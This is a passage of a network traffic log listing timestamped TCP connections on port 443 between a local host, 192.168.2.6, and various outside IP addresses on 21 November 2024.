Nov 21, 2024 09:53:42.745392084 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:42.745430946 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:42.791960955 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:42.984625101 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.984679937 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:42.984700918 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.984741926 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:42.984747887 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.984812021 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.984889984 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.984899044 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:42.985054016 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.987158060 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.987168074 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:42.987253904 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.987265110 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:42.987287998 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:42.987303019 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:43.105587006 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.105664015 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.107670069 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.107702971 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.108062029 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.146390915 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.191335917 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.383591890 CET	443	49704	173.222.162.64	192.168.2.6
Nov 21, 2024 09:53:43.383747101 CET	49704	443	192.168.2.6	173.222.162.64
Nov 21, 2024 09:53:43.497332096 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.497843027 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.497946024 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.497978926 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.498179913 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.498215914 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.498630047 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.498635054 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.498665094 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.498670101 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.499222994 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.499564886 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.499583960 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.499910116 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.499916077 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.505656958 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.506045103 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.506078005 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.506401062 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.506408930 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.506757975 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.506999969 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.507014036 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.507338047 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.507340908 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.657250881 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.657344103 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.657402039 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.657502890 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.657525063 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.657540083 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.657546043 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.693593979 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.693732977 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.693872929 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.694204092 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:43.694230080 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:43.940706015 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.940781116 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.940936089 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.942604065 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.942631006 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.942696095 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.942696095 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.942734003 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.946474075 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.946500063 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.946552992 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.946568966 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.946610928 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.948542118 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.948613882 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.948671103 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.951663017 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.951682091 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.951694012 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.951699972 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.952040911 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.952112913 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.952233076 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.952986956 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.953008890 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.953020096 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.953026056 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.954535961 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.954569101 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.954654932 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.954664946 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.955033064 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.955050945 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.955065966 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.955073118 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.955636024 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.955703974 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.955746889 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.955753088 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.955766916 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.955771923 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.957048893 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.957056046 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.957065105 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.957067966 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.960918903 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.960974932 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.961183071 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.962251902 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.962268114 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.963671923 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.963732958 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.963922977 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.964385986 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.964425087 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.965190887 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.965203047 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.965414047 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.965563059 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.965578079 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.968161106 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.968189001 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.968425035 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.969280005 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.969327927 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.969428062 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.969579935 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.969594002 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:43.969717026 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:43.969737053 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:44.176984072 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:44.177064896 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:44.177139044 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:44.177413940 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:44.177452087 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:44.229279995 CET	49749	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:44.229326010 CET	443	49749	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:44.229384899 CET	49749	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:44.229610920 CET	49749	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:44.229628086 CET	443	49749	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:44.778570890 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.778733969 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.782305002 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.782330036 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.783200979 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.783273935 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.789366961 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.789433002 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.792736053 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.792867899 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.810400009 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.810416937 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.810533047 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.810539961 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.810728073 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.810827017 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.838511944 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.838602066 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.844496012 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.844506979 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.844772100 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:44.844779968 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.845491886 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:44.845558882 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.191822052 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.191859007 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.191895962 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.191920042 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.191950083 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.191992044 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.191996098 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.192058086 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.192065954 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.192094088 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.194148064 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.194238901 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:45.196649075 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:45.196674109 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.197597027 CET	49737	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.197614908 CET	443	49737	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.197756052 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.199111938 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:45.243334055 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.448563099 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.448615074 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.448633909 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.448667049 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.448678970 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.448718071 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.448724031 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.448771000 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.448823929 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.448873997 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.449135065 CET	49739	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.449148893 CET	443	49739	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.455163002 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.455199003 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.455220938 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.455229998 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.455257893 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.455267906 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.455307007 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.455334902 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.609296083 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:45.609509945 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:45.609559059 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:45.611296892 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:45.611396074 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:45.611785889 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:45.611882925 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:45.611897945 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:45.611937046 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:45.631835938 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.631932020 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.631953955 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.632056952 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.632056952 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.632097006 CET	443	49738	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:45.632157087 CET	49738	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:45.666369915 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:45.666412115 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:45.685792923 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.692198992 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.692230940 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.692883015 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.692892075 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.712189913 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:45.750426054 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.750520945 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.750581980 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:45.756947994 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:45.756983042 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.757003069 CET	49740	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:45.757013083 CET	443	49740	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:45.758548021 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.760211945 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.760322094 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.760643959 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.760658979 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.795520067 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.799380064 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.799453020 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.799926996 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.799942017 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.804203033 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.804514885 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.804546118 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.805039883 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.805047035 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.827491999 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.869968891 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.880258083 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.880270958 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:45.880944967 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:45.880951881 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.120956898 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.121048927 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.121123075 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.121265888 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.121265888 CET	49744	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.121314049 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.121342897 CET	443	49744	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.124501944 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.124572992 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.124641895 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.124834061 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.124865055 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.138093948 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:46.138222933 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:46.138278008 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:46.138499022 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:46.138531923 CET	443	49748	142.250.186.100	192.168.2.6
Nov 21, 2024 09:53:46.138557911 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:46.138580084 CET	49748	443	192.168.2.6	142.250.186.100
Nov 21, 2024 09:53:46.202856064 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.202938080 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.203002930 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.203237057 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.203262091 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.203277111 CET	49743	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.203284979 CET	443	49743	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.206322908 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.206371069 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.206444025 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.206724882 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.206746101 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.238890886 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.238962889 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.239027977 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.240025997 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.240077972 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.240109921 CET	49742	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.240127087 CET	443	49742	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.242563963 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.242595911 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.242830992 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.243083954 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.243098974 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.259517908 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.259587049 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.259637117 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.261151075 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.261190891 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.261236906 CET	49741	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.261253119 CET	443	49741	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.276139021 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.276185036 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.276241064 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.277862072 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.277888060 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.281047106 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.281233072 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.281286001 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.281387091 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.281400919 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.281413078 CET	49745	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.281418085 CET	443	49745	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.287693024 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.287724018 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.287796021 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.287949085 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:46.287964106 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:46.328391075 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:46.328459978 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:46.328540087 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:46.340840101 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:46.340866089 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:46.502162933 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:46.502221107 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:46.502307892 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:46.503897905 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:46.503928900 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:46.537497997 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.537535906 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:46.537586927 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.542447090 CET	49760	443	192.168.2.6	150.171.27.10
